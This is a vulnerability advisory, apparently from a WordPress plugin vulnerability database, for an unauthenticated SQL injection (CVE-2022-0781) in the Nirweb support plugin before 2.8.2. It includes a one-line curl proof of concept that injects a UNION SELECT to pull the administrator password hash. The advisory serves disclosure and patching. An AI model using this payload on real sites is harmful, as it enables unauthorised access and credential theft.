Nirweb support < 2.8.2 – Unauthenticated SQLi | CVE 2022-0781 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,(SELECT user_pass FROM wp_users WHERE ID = 1),NULL,NULL,NULL,NULL,NULL-- -'

Affects Plugins

Fixed in 2.8.2

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

1a8f9c7b-a422-4f45-a516-c3c14eb05161

Timeline

Publicly Published

2022-05-02 (about 3 years ago)

Added

2022-05-02 (about 3 years ago)

Last Updated

2022-05-02 (about 3 years ago)

Other

Published

Title

Published

2025-09-29

Title

AffiliateWP < 2.29.0 - Unauthenticated SQL Injection

Published

2024-10-18

Title

SermonAudio Widgets <= 1.9.3 - Authenticated (Contributor+) SQL Injection

Published

2015-07-16

Title

NEX-Forms < 4.6.1 - Unauthenticated Blind SQL Injection

Published

2014-10-11

Title

Huge IT Image Gallery 1.0.1 - SQL Injection

Published

2024-10-30

Title

Administrator Z < 2024.10.21 - Subscriber+ SQL Injection